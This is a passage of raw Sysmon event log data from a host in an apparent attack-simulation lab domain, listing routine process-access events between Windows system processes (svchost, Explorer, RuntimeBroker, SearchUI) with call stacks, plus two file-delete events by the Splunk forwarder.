12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Sys
tem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll
+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.173{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E52B4F8E6B6368663791FC473713A6,SHA256=725CBFE35E36BADB9AB3E331952598BDB9271A295DED855CC1031A33B5F95E9D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000011021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.845{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CA298E7523D9684747ADD07BFA93B1,SHA256=3EFC55F11607971CA2F14F402D1C322E9E8A6FD1EA4E1CB12639C336D9E94E09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\S